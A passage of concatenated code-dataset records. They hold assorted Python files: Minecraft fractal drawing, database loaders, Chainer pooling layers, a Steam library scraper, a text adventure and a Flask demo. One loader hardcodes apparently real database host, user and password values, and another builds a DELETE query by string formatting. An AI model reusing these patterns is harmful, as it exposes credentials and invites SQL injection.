are at location p and select vertex q to move towards\n# frac is the distance we move along pq: And this might be more than 1 or negative\n# nSteps is the number of hops we will take\n# block and blockQ specify the artifact at p\ndef ChaosGame3D(mc, v, frac, nHops, block, blockQ): \n n, a = len(v), mc.player.getPos()\n a.x, a.y, a.z = a.x + 20, 20, a.z + 20 # an origin offset from player\n p = mc.player.getPos() \n verts = [] # vertex locations as triples\n for i in range(n):\n (p.x, p.y, p.z)= (v[i][0] + a.x, v[i][1] + a.y, v[i][2] + a.z)\n verts.append((p.x, p.y, p.z))\n for i in range(nHops):\n p.x, p.y, p.z = FracJump(p, verts[randint(0, n-1)], frac)\n # mc.setBlock(p.x, p.y, p.z, randint(1,60), 0)\n mc.setBlock(p.x, p.y, p.z, block)\n\nmc = Minecraft.create()\nmc.player.setPos(x0, 100, z0) # Put the player at this location\n\nv = []\n# for i in range(n): v.append((randint(0,511),randint(0,255),randint(0,511)))\nv.append((0, 0, 0))\nv.append((180, 0, 300))\nv.append((-180, 0, 300))\nv.append((0, 255, 180))\n\nChaosGame3D(mc, v, frac = 0.5, nHops = 5000, block = 41, blockQ = 0)\n","sub_path":"minecraft/Resources/ChaosGame.py","file_name":"ChaosGame.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580335419","text":"import mysql.connector\nimport pandas as pd\n\nconnection = mysql.connector.connect(\n host=\"seng2021.csbfa4eylzxn.us-east-2.rds.amazonaws.com\",\n database=\"StockPrediction\",\n user=\"root\",\n password=\"SEFall2021\",\n)\n\n\ndef main():\n loadStockDataFromCSV()\n\n\ndef loadStockDataFromCSV():\n StockData = pd.read_csv(\"stocks.csv\")\n StockData.columns = [\"stock_id\", \"stock_name\"]\n if connection.is_connected():\n cursor = connection.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS stock;\")\n cursor.execute(\n \"CREATE TABLE stock(stock_id nvarchar(50), stock_name nvarchar(50))\"\n )\n for row in StockData.index:\n sql = \"INSERT INTO stock(stock_id,stock_name)VALUES(%s,%s);\"\n cursor.execute(\n sql,\n (\n str(StockData.loc[row, \"stock_id\"]),\n str(StockData.loc[row, \"stock_name\"]),\n ),\n )\n connection.commit()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"flaskr/loadstocks.py","file_name":"loadstocks.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"491041788","text":"import psycopg2\nfrom credentials import cr_dbname, cr_host, cr_password, cr_user\n\ndef insert_action1(action, newId, modified, action_counter):\n \"\"\" delete values from the stand_action table\"\"\"\n delete_action_query = \"\"\"DELETE FROM forest.action WHERE standestimation_id = {}\"\"\".format(newId)\n \"\"\" insert a values into the stand_action table \"\"\"\n action_query = \"\"\"INSERT INTO forest.action (\n actiontype_id,\n intensity,\n standestimation_id,\n priority,\n modified,\n plan_fact,\n actionurgency_id,\n unit_id,\n quantity,\n f_type\n )\n VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n action_data= (\n action['action_type']['code'],\n action['action_intensity']['code'],\n newId,\n 1,\n modified,\n 0,\n action['action_urgency']['code'],\n 1,\n action['action_area']['value'], \n 'f25'\n )\n print(action_data)\n conn = None\n try:\n conn = psycopg2.connect(\n dbname=cr_dbname, user=cr_user, password=cr_password, host=cr_host)\n cur = conn.cursor()\n if action_counter == 0:\n cur.execute(delete_action_query)\n cur.execute(action_query, (action_data))\n print('action')\n conn.commit()\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n","sub_path":"stand_estimation_oopt/insertAction1.py","file_name":"insertAction1.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179658362","text":"import collections\n\nimport numpy\n\nfrom chainer import cuda\nfrom chainer import cudnn\nfrom chainer import function\nfrom chainer.utils import conv\nfrom chainer.utils import type_check\n\nif cudnn.available:\n from chainer.cudnn import libcudnn\n\n\ndef _pair(x):\n if isinstance(x, collections.Iterable):\n return x\n return (x, x)\n\n\nclass Pooling2D(function.Function):\n\n \"\"\"Base class of pooling function over a set of 2d planes.\"\"\"\n\n def __init__(self, ksize, stride=None, pad=0, cover_all=True,\n use_cudnn=True):\n if stride is None:\n stride = ksize\n\n self.kh, self.kw = _pair(ksize)\n self.sy, self.sx = _pair(stride)\n self.ph, self.pw = _pair(pad)\n\n self.cover_all = cover_all\n self.use_cudnn = use_cudnn\n\n def check_type_forward(self, in_types):\n type_check.expect(\n in_types.size() == 1,\n in_types[0].dtype == numpy.float32,\n in_types[0].ndim == 4\n )\n\n def forward_gpu(self, x):\n # Implementation using cudnn\n n, c, h, w = x[0].shape\n y_h = conv.get_conv_outsize(\n h, self.kh, self.sy, self.ph, self.cover_all)\n y_w = conv.get_conv_outsize(\n w, self.kw, self.sx, self.pw, self.cover_all)\n y = cuda.empty((n, c, y_h, y_w), dtype=numpy.float32)\n\n handle = cudnn.get_default_handle()\n pool_desc = self.create_pool_desc()\n x_desc = cudnn.get_tensor_desc(x[0], x[0].shape[2], x[0].shape[3])\n y_desc = cudnn.get_tensor_desc(y, y_h, y_w)\n\n libcudnn.cudnnPoolingForward(\n handle, pool_desc.value, 1, x_desc.value, cudnn.get_ptr(x[0]),\n 0, y_desc.value, cudnn.get_ptr(y))\n self.y = y\n\n return y,\n\n def backward_gpu(self, x, gy):\n # Implementation using cudnn\n handle = cudnn.get_default_handle()\n pool_desc = self.create_pool_desc()\n\n x_desc = cudnn.get_tensor_desc(x[0], x[0].shape[2], x[0].shape[3])\n y_desc = cudnn.get_tensor_desc(gy[0], gy[0].shape[2], gy[0].shape[3])\n\n gx = cuda.empty_like(x[0])\n libcudnn.cudnnPoolingBackward(\n handle, pool_desc.value, 1, y_desc.value, cudnn.get_ptr(self.y),\n y_desc.value, cudnn.get_ptr(\n gy[0]), x_desc.value, cudnn.get_ptr(x[0]),\n 0, x_desc.value, cudnn.get_ptr(gx))\n return gx,\n\n def create_pool_desc(self):\n raise NotImplementedError()\n\n\nclass MaxPooling2D(Pooling2D):\n\n \"\"\"Max pooling over a set of 2d planes.\"\"\"\n\n def forward_cpu(self, x):\n col = conv.im2col_cpu(\n x[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,\n pval=-float('inf'), cover_all=self.cover_all)\n n, c, kh, kw, out_h, out_w = col.shape\n col = col.reshape(n, c, kh * kw, out_h, out_w)\n\n # We select maximum twice, since the implementation using numpy.choose\n # hits its bug when kh * kw >= 32.\n self.indexes = col.argmax(axis=2)\n y = col.max(axis=2)\n return y,\n\n def forward_gpu(self, x):\n if cudnn.enabled and self.use_cudnn:\n return super(MaxPooling2D, self).forward_gpu(x)\n\n n, c, h, w = x[0].shape\n y_h = conv.get_conv_outsize(\n h, self.kh, self.sy, self.ph, self.cover_all)\n y_w = conv.get_conv_outsize(\n w, self.kw, self.sx, self.pw, self.cover_all)\n y = cuda.empty((n, c, y_h, y_w), dtype=numpy.float32)\n self.indexes = cuda.empty((n, c, y_h, y_w), dtype=numpy.int32)\n\n cuda.elementwise(\n '''\n float* out, int* indexes, const float* in,\n int h, int w, int out_h, int out_w,\n int kh, int kw, int sy, int sx, int ph, int pw\n ''', '''\n int c0 = i / (out_h * out_w);\n int out_y = i / out_w % out_h;\n int out_x = i % out_w;\n int in_y_0 = max(0, out_y * sy - ph);\n int in_y_1 = min(h, out_y * sy + kh - ph);\n int in_x_0 = max(0, out_x * sx - pw);\n int in_x_1 = min(w, out_x * sx + kw - pw);\n\n float maxval = in[in_x_0 + w * (in_y_0 + h * c0)];\n int argmax_y = in_y_0;\n int argmax_x = in_x_0;\n for (int y = in_y_0; y < in_y_1; ++y) {\n int offset_y = w * (y + h * c0);\n for (int x = in_x_0; x < in_x_1; ++x) {\n float v = in[x + offset_y];\n if (maxval < v) {\n maxval = v;\n argmax_y = y;\n argmax_x = x;\n }\n }\n }\n out[i] = maxval;\n\n int argmax_ky = argmax_y + ph - out_y * sy;\n int argmax_kx = argmax_x + pw - out_x * sx;\n indexes[i] = argmax_kx + kw * argmax_ky;\n ''', 'max_pool_fwd')(y, self.indexes, x[0], h, w, y_h, y_w,\n self.kh, self.kw, self.sy, self.sx, self.ph,\n self.pw)\n return y,\n\n def backward_cpu(self, x, gy):\n n, c, out_h, out_w = gy[0].shape\n h, w = x[0].shape[2:]\n gcol = numpy.zeros(\n (n, c, self.kh, self.kw, out_h, out_w), dtype=numpy.float32)\n\n # TODO(beam2d): Make it fast\n gcol_r = numpy.rollaxis(gcol.reshape(n, c, -1, out_h, out_w), 2)\n for i in numpy.ndindex(n, c, out_h, out_w):\n gcol_r[self.indexes[i]][i] = gy[0][i]\n\n gx = conv.col2im_cpu(gcol, self.sy, self.sx, self.ph, self.pw, h, w)\n return gx,\n\n def backward_gpu(self, x, gy):\n if cudnn.enabled and self.use_cudnn:\n return super(MaxPooling2D, self).backward_gpu(x, gy)\n\n n, c, h, w = x[0].shape\n y_h, y_w = gy[0].shape[2:]\n gx = cuda.empty_like(x[0])\n\n cuda.elementwise(\n '''\n float* gx, const int* indexes, const float* gy,\n int h, int w, int out_h, int out_w,\n int kh, int kw, int sy, int sx, int ph, int pw\n ''', '''\n int c0 = i / (h * w);\n int y = i / w % h + ph;\n int x = i % w + pw;\n int out_y_0 = max(0, (y - kh + sy) / sy);\n int out_y_1 = min(out_h, (y + sy) / sy);\n int out_x_0 = max(0, (x - kw + sx) / sx);\n int out_x_1 = min(out_w, (x + sx) / sx);\n\n float val = 0;\n for (int out_y = out_y_0; out_y < out_y_1; ++out_y) {\n int ky = y - out_y * sy;\n for (int out_x = out_x_0; out_x < out_x_1; ++out_x) {\n int kx = x - out_x * sx;\n int offset = out_x + out_w * (out_y + out_h * c0);\n if (indexes[offset] == kx + kw * ky) {\n val += gy[offset];\n }\n }\n }\n gx[i] = val;\n ''',\n 'max_pool_bwd')(gx, self.indexes, gy[0], h, w, y_h, y_w, self.kh,\n self.kw, self.sy, self.sx, self.ph, self.pw)\n return gx,\n\n def create_pool_desc(self):\n return cudnn.get_pool2d_desc(\n (self.kh, self.kw), (self.sy, self.sx), (self.ph, self.pw),\n 'CUDNN_POOLING_MAX')\n\n\ndef max_pooling_2d(x, ksize, stride=None, pad=0, cover_all=True,\n use_cudnn=True):\n \"\"\"Spatial max pooling function.\n\n This function acts similarly to :class:`~functions.Convolution2D`, but\n it computes the maximum of input spatial patch for each channel\n without any parameter instead of computing the inner products.\n\n Args:\n x (~chainer.Variable): Input variable.\n ksize (int or (int, int)): Size of pooling window. ``ksize=k`` and\n ``ksize=(k, k)`` are equivalent.\n stride (int or (int, int) or None): Stride of pooling applications.\n ``ksize=k`` and ``ksize=(k, k)`` are equivalent. If None is\n specified, then it uses same stride as the pooling window size.\n pad (int or (int, int)): Spatial padding width for the input array.\n ``pad=p`` and ``pad=(p, p)`` are equivalent.\n cover_all (bool): If True, all spatial locations are pooled into some\n output pixels. It may make the output size larger.\n use_cudnn (bool): If True and CuDNN is enabled, then this function\n uses CuDNN as the core implementation.\n\n Returns:\n ~chainer.Variable: Ouptut variable.\n\n \"\"\"\n return MaxPooling2D(ksize, stride, pad, cover_all, use_cudnn)(x)\n\n\nclass AveragePooling2D(Pooling2D):\n\n \"\"\"Average pooling over a set of 2d planes.\"\"\"\n # TODO(beam2d): Support cover_all mode.\n\n def forward_cpu(self, x):\n col = conv.im2col_cpu(x[0], self.kh, self.kw, self.sy, self.sx,\n self.ph, self.pw)\n y = col.mean(axis=(2, 3))\n return y,\n\n def forward_gpu(self, x):\n if cudnn.enabled and self.use_cudnn:\n return super(AveragePooling2D, self).forward_gpu(x)\n\n n, c, h, w = x[0].shape\n y_h = conv.get_conv_outsize(h, self.kh, self.sy, self.ph)\n y_w = conv.get_conv_outsize(w, self.kw, self.sx, self.pw)\n y = cuda.empty((n, c, y_h, y_w), dtype=numpy.float32)\n coeff = 1. / (self.kh * self.kw)\n\n cuda.elementwise(\n '''\n float* out, const float* in, int h, int w, int out_h, int out_w,\n int kh, int kw, int sy, int sx, int ph, int pw, float coeff\n ''', '''\n int c0 = i / (out_h * out_w);\n int out_y = i / out_w % out_h;\n int out_x = i % out_w;\n int in_y_0 = max(0, out_y * sy - ph);\n int in_y_1 = min(h, out_y * sy + kh - ph);\n int in_x_0 = max(0, out_x * sx - pw);\n int in_x_1 = min(w, out_x * sx + kw - pw);\n\n float val = 0;\n for (int y = in_y_0; y < in_y_1; ++y) {\n int offset_y = w * (y + h * c0);\n for (int x = in_x_0; x < in_x_1; ++x) {\n val += in[x + offset_y];\n }\n }\n out[i] = val * coeff;\n ''', 'avg_pool_fwd')(y, x[0], h, w, y_h, y_w, self.kh, self.kw,\n self.sy, self.sx, self.ph, self.pw, coeff)\n return y,\n\n def backward_cpu(self, x, gy):\n h, w = x[0].shape[2:]\n gcol = numpy.tile(gy[0][:, :, numpy.newaxis, numpy.newaxis],\n (1, 1, self.kh, self.kw, 1, 1))\n gx = conv.col2im_cpu(gcol, self.sy, self.sx, self.ph, self.pw, h, w)\n gx /= self.kh * self.kw\n return gx,\n\n def backward_gpu(self, x, gy):\n if cudnn.enabled and self.use_cudnn:\n return super(AveragePooling2D, self).backward_gpu(x, gy)\n\n n, c, h, w = x[0].shape\n y_h, y_w = gy[0].shape[2:]\n gx = cuda.empty_like(x[0])\n coeff = 1. / (self.kh * self.kw)\n\n cuda.elementwise(\n '''\n float* gx, const float* gy, int h, int w, int out_h, int out_w,\n int kh, int kw, int sy, int sx, int ph, int pw, float coeff\n ''', '''\n int c0 = i / (h * w);\n int y = i / w % h + ph;\n int x = i % w + pw;\n int out_y_0 = max(0, (y - kh + sy) / sy);\n int out_y_1 = min(out_h, (y + sy) / sy);\n int out_x_0 = max(0, (x - kw + sx) / sx);\n int out_x_1 = min(out_w, (x + sx) / sx);\n int hc0 = out_h * c0;\n\n float val = 0;\n for (int out_y = out_y_0; out_y < out_y_1; ++out_y) {\n for (int out_x = out_x_0; out_x < out_x_1; ++out_x) {\n val += gy[out_x + out_w * (out_y + hc0)];\n }\n }\n gx[i] = val * coeff;\n ''', 'avg_pool_bwd')(gx, gy[0], h, w, y_h, y_w, self.kh, self.kw,\n self.sy, self.sx, self.ph, self.pw, coeff)\n return gx,\n\n def create_pool_desc(self):\n return cudnn.get_pool2d_desc(\n (self.kh, self.kw), (self.sy, self.sx), (self.ph, self.pw),\n 'CUDNN_POOLING_AVERAGE_COUNT_INCLUDE_PADDING')\n\n\ndef average_pooling_2d(x, ksize, stride=None, pad=0, use_cudnn=True):\n \"\"\"Spatial average pooling function.\n\n This function acts similarly to :class:`~functions.Convolution2D`, but\n it computes the average of input spatial patch for each channel\n without any parameter instead of computing the inner products.\n\n Args:\n x (~chainer.Variable): Input variable.\n ksize (int or (int, int)): Size of pooling window. ``ksize=k`` and\n ``ksize=(k, k)`` are equivalent.\n stride (int or (int, int) or None): Stride of pooling applications.\n ``ksize=k`` and ``ksize=(k, k)`` are equivalent. If None is\n specified, then it uses same stride as the pooling window size.\n pad (int or (int, int)): Spatial padding width for the input array.\n ``pad=p`` and ``pad=(p, p)`` are equivalent.\n use_cudnn (bool): If True and CuDNN is enabled, then this function\n uses CuDNN as the core implementation.\n\n Returns:\n ~chainer.Variable: Output variable.\n\n .. note::\n\n This function currently does not support ``cover_all`` mode as\n :func:`max_pooling_2d`. Average pooling runs in non-cover-all mode.\n\n \"\"\"\n return AveragePooling2D(ksize, stride, pad, False, use_cudnn)(x)\n","sub_path":"chainer/functions/pooling_2d.py","file_name":"pooling_2d.py","file_ext":"py","file_size_in_byte":13605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167462783","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/firestore/datatypes/map.py\n# Compiled at: 2019-08-25 22:19:11\n# Size of source mod 2**32: 2603 bytes\nfrom firestore.containers.collection import Collection\nfrom firestore.datatypes.base import Base\nfrom firestore.errors import ValidationError\n\nclass MapSchema(Collection):\n __doc__ = '\\n A map schema defines a helper by which maps can be populated\\n so there is no need to use default python dicts'\n\n def __init__(self, *args, **kwargs):\n self.py_type = dict\n (super(MapSchema, self).__init__)(*args, **kwargs)\n\n\nclass Map(Base):\n __doc__ = 'Maps as defined by firestore represent an object saved within a document.\\n In python speak - A map is akin to a dictionary.\\n\\n Maps on Firestore cloud are an ordered collection of key value pairs\\n and the firestore library mimics this sorting at retrieval and traversal\\n which is sufficient for almost use cases encountered in the wild\\n '\n\n def __init__(self, *args, **kwargs):\n try:\n self.map_ref = args[0]\n except IndexError:\n self.map_ref = None\n\n (super(Map, self).__init__)(*args, **kwargs)\n\n def __set__(self, instance, value):\n self.validate(value)\n if self.map_ref:\n value = (self.map_ref)(**value) if isinstance(value, dict) else value\n self.value = value\n instance.add_field(self, value)\n instance.__mutated__ = True\n\n def validate(self, value, instance=None):\n if self.map_ref:\n if not isinstance(value, (MapSchema, dict)):\n raise ValueError()\n if isinstance(value, dict):\n _schema = self.map_ref.__autospector__()\n for k in _schema:\n f = _schema.get(k)\n v = value.get(k)\n f.validate(v)\n\n else:\n value._presave()","sub_path":"pycfiles/firestore-0.0.8-py3.7/map.cpython-37.py","file_name":"map.cpython-37.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"313483771","text":"\nimport math\n\ndef guardarNumero (numeroSeisCifras):\n if (numeroSeisCifras<100000 or numeroSeisCifras>999999):\n print (\"Boleta inválida\")\n quit()\n if (numeroSeisCifras>=100000 and numeroSeisCifras<1000000): \n cienMiles=math.trunc(numeroSeisCifras/100000)\n diezMiles=math.trunc((numeroSeisCifras-(cienMiles*100000))/10000)\n miles=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)))/1000)\n cientos=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)+(miles*1000)))/100)\n decenas=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)+(miles*1000)+(cientos*100)))/10)\n unidades=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)+(miles*1000)+(cientos*100)+(decenas*10))))\n horario=(miles+cientos)\n if ((unidades+cienMiles)>5):\n print (\"tu boleta es válida\")\n if (diezMiles>0 and diezMiles<7):\n print (\", el tipo de entrada es gramilla\") \n if (diezMiles==0 or (diezMiles>6 and diezMiles<=9)):\n print (\", el tipo de entrada es general\") \n if (horario==1 or horario==3 or horario==5 or horario==7 or horario==9 or horario==11 or horario==13 or horario==15 or horario==17):\n print (\", debes entrar por la puerta 2 a partir de las 8pm\")\n if (horario==2 or horario==4 or horario==6 or horario== 8 or horario== 10 or horario== 12 or horario== 14 or horario== 16 or horario==18 or horario==0):\n print (\", debes entrar por la puerta 1 a partir de las 7pm\") \n \n\n\n\n\n\n\n\n#--------------------------------------------\n#main\n\nnumeroSeisCifras = int(input(\"Digite un numero de seis cifras.\"))\n\nguardarNumero (numeroSeisCifras)\n","sub_path":"programa3.py","file_name":"programa3.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28400542","text":"import os, logging\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\nfrom components import Device, Link, create\nfrom topology import Topology\nfrom mint.utils import each\n\nlog = logging.getLogger('scene')\n\nclass Scene(QGraphicsScene):\n\n def __init__(self, models):\n super(Scene, self).__init__()\n self.setSceneRect(-4000, -4000, 8000, 8000)\n self.populate(models)\n\n def populate(self, models):\n self.devices = []\n self.links = []\n self.items = []\n tip2device = {}\n for model in models:\n item = create(model)\n if item:\n log.debug('adding {}'.format(model))\n self.items.append(item)\n if isinstance(item, Device):\n log.debug('update {}\\'s tips'.format(model))\n tip2device.update({tip: item for tip in model.tips})\n self.devices.append(item)\n elif isinstance(item, Link):\n item.setZValue(-1)\n self.links.append(item)\n log.debug('adding finished: {}'.format(\n map(str, each(self.items).model)))\n self.load_ok = True\n for link in self.links:\n peers = each(link.model.tips).peer\n try:\n link.devices = tuple(tip2device[tip] for tip in peers)\n except KeyError:\n log.error('{}\\'s endpoint is not added to scene'.format(\n link.model))\n self.ok = False\n if self.load_ok:\n for item in self.items:\n self.addItem(item)\n self.addItem(item.console)\n\n def load(self):\n path = QApplication.instance().resources['path']\n self.topo_path = os.path.join(path, 'topos')\n if self.load_ok:\n ok = Topology(self.views()[0], self.items, self.topo_path).load()\n self.views()[0].load_ok = ok\n\n def save(self):\n if self.load_ok:\n Topology(self.views()[0], self.items, self.topo_path).save()\n\n def update_status(self):\n each(self.items).refresh()\n\n def toggle(self, what):\n each(self.items).toggle(what)\n","sub_path":"mint/_versions/20151130230204 switch port frame lost/mint/gui/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15420702","text":"import requests, json\n\n\nclass SteamGameGrabber(object):\n\n def __init__(self):\n\n self.url = ''\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n self.start_tag = \"var rgGames\"\n self.end_tag = \"var rgChangingGames\"\n\n self.last_data = {}\n\n def send_request(self):\n\n try:\n response = requests.get(self.url, headers=self.headers)\n raw_data = str(response.content, encoding=\"utf-8\")\n except:\n return [False, \"Something Wrong! Connection Lost!\"]\n\n else:\n if response.status_code == 200:\n return [True, raw_data]\n else:\n return [False, \"Check Your Connection ( status_code is Not 200 )!\"]\n\n def pars_data(self, get_input):\n\n def find_between(s, first, last):\n\n try:\n start = s.index(first) + len(first)\n end = s.index(last, start)\n except:\n return [False, \"Parsing Error\"]\n else:\n return [True, s[start:end]]\n\n if \"Steam Community :: Error\" in get_input:\n return [False, \"I Can Not Find This ID on Steam Server\"]\n\n if '
' in get_input:\n return [False, \"This profile is private, I can not Decode it, sorry.\"]\n\n get_data = find_between(get_input, self.start_tag, self.end_tag)\n\n if get_data[0] is True:\n\n dict_data = json.loads(get_data[1].strip().lstrip(\"=\").rstrip(\";\").strip())\n\n try:\n for box in dict_data:\n\n game_id = str(box['appid']).strip()\n game_name = box['name'].strip()\n\n if game_name in self.last_data:\n pass\n\n else:\n\n self.last_data[game_name] = game_id\n except:\n return [False, \"Format is Wrong\"]\n\n else:\n return [True, self.last_data]\n\n else:\n return [False, get_data[1]]\n\n def call_all(self, get_id):\n\n if get_id.strip() == \"\":\n return \"Please Insert Your Steam ID\"\n\n else:\n new_id = self.URLstrip(get_id)\n\n if 'id' in get_id:\n self.url = 'http://steamcommunity.com/id/{0}/games/?tab=all'.format(new_id)\n elif 'profile' in get_id:\n self.url = 'http://steamcommunity.com/profiles/{0}/games/?tab=all'.format(new_id)\n\n get_state_1 = self.send_request()\n\n if get_state_1[0] is True:\n\n get_state_2 = self.pars_data(get_state_1[1])\n return get_state_2[1]\n\n else:\n return get_state_1[1]\n\n def URLstrip(self, url):\n if 'id' in url:\n part = url.find('id')\n new_id = url[int(part)+3:len(url)]\n return new_id\n elif 'profile' in url:\n part = url.find('profiles')\n new_id = url[int(part)+9:len(url)]\n return new_id\n\ndef getSameGames(user_list):\n total_games = []\n final_list = []\n for user in user_list:\n your_id = user\n make_object = SteamGameGrabber()\n get_result = make_object.call_all(your_id)\n for names, appid in get_result.items():\n total_games.append(names)\n for item in total_games:\n if total_games.count(item) >= len(user_list):\n final_list.append(item)\n new = set(final_list)\n return(new)\n","sub_path":"game_grabber.py","file_name":"game_grabber.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"376558597","text":"from room import Room\nfrom item import Item\nfrom player import Player\n\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\"),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"),\n}\n\n# Link rooms together\n#\n# Main\n#\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\nitem = {\n 'sword': Item(\"Katana Sword\", \"A Japanese sword for samurai\"),\n 'knife': Item(\"Knife\", \"Chinese dagger\"),\n 'arrow': Item(\"Bow and Arrow\", \"Bow and arrow laced with poison\"),\n 'rope': Item(\"rope\", \"rope with claws\")\n}\n\nroom['outside'].items = [\n item['sword'],\n item['rope']\n]\n\nroom['foyer'].items = [\n item['knife'],\n item['arrow'],\n]\n\nroom['overlook'].items = [\n item['sword'],\n item['knife'],\n]\n\nroom['narrow'].items = [\n item['arrow'],\n item['sword'],\n]\n\nroom['treasure'].items = [\n item['arrow'],\n item['sword'],\n item['rope']\n]\n\n\nclass Adv(Player):\n def __init__(self, name, current_room):\n super().__init__(name, current_room)\n\n def __str__(self):\n return f\"Welcome, {self.name} and your are in {self.current_room} \"\n\n\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.tim\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n# player_input = ''\n\n# while len(player.name) != 0:\n# player_input = input(\"Pick your location, using 'n' for north, 's' for south, 'w' for west, 'e' for east \")\n\n# current_location = 'outside'\n# print(room[current_location])\n\nplayer = Adv('Tiger', room['outside'])\nprint(player)\nprint(player.get_player_instruction())\n\n\nwhile True:\n direction = input(\"\\nKindly input your direction or action\")\n\n try:\n if direction == 'n':\n if hasattr(player.get_current_room(), 'n_to'):\n player.set_current_room(player.get_current_room().n_to)\n print(player.get_current_room())\n else:\n print(f\"\\nSorry there no way there \\n\")\n\n if direction == 's':\n if hasattr(player.get_current_room(), 's_to'):\n player.set_current_room(player.get_current_room().s_to)\n print(player.get_current_room())\n else:\n print(f\"\\nSorry now to the south\\n\")\n\n if direction == 'w':\n if hasattr(player.get_current_room(), 'w_to'):\n player.set_current_room(player.get_current_room().s_to)\n print(player.get_current_room())\n else:\n print(f\"\\n No way to west..\\n\")\n\n if direction == 'e':\n if hasattr(player.get_current_room(), 'e_to'):\n player.set_current_room(player.get_current_room().s_to)\n print(player.get_current_room())\n else:\n print(f\"\\nSorry now to the east..closed\\n\")\n else:\n print('Wrong direction, bye')\n except ValueError:\n print(f\"{super.__get_player_instruction__}\")\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"73033873","text":"'''example\nu can use requests library to do this operation.\n\nGET\n http://localhost:8003/\n http://localhost:8003/Deepak\n http://localhost:8003/hello?name=Luis\n\nPOST\n http://localhost:1234/messages\n H \"Content-type: application/json\" or \"Content-type: text/plain\"\n body '{\"message\":\"Hello Data\"}\n\nhtml:\n\n'''\n\n#Note : Create templates folder and dump html files insidepos\n\nfrom flask import request,Flask,json,render_template,jsonify\n\n\napp = Flask(__name__)\n@app.route('/',methods = ['GET','POST'])\ndef index():\n if request.method==\"GET\":return render_template('input.html')\n elif request.method==\"POST\":\n data = request.form\n fname = data['fname']\n sname = data['sname']\n return render_template(\"output.html\", first_name=fname, sec_name=sname)\n\n@app.route(\"//\", methods = ['GET','POST'])\ndef api_hello(resource):\n if resource == \"deepak\":return render_template('deepak.html', name=\"test\")\n elif 'name' in request.args and request.method=='GET':return 'who is ' + request.args['name']\n elif request.method == 'POST':\n if request.headers['Content-Type'] == 'text/plain':return \"Text Message: \" + str(request.data)\n elif request.headers['Content-Type'] == 'application/json': return \"JSON Message: \" + json.dumps(request.json)\n else:return \"did u mean -- 0.0.0.0:port_num/{}?name=something\".format(resource)\n\n@app.errorhandler(500)\ndef not_found(error=None):\n message = { 'status': 500, 'message': 'Not Found: ' + request.url}\n resp = jsonify(message)\n resp.status_code = 500\n return resp\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8003)","sub_path":"flask_venv/Flask_Sample.py","file_name":"Flask_Sample.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237896199","text":"import os\r\nfrom keras.models import model_from_json\r\nfrom keras.optimizers import Adam\r\nimport pandas as pd\r\n\r\nHEIGHT = 128\r\nWIDTH = 128\r\n\r\npath_val = os.getcwd() + 